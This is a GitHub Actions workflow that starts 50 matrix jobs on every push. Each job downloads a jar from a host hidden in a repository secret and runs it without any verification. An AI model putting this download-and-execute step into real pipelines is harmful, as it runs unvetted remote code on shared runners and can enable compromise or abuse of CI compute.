name: qwq
on:
  push:

jobs:
  worker:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        base: [1, 2, 3, 4, 5]
        next: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    steps:
    - uses: actions/setup-java@v5
      with:
        distribution: 'temurin'
        java-version: '21'
    - name: working
      run: |
        curl -o generator.jar https://${{ secrets.REMOTE }}/generator.jar
        java -jar generator.jar
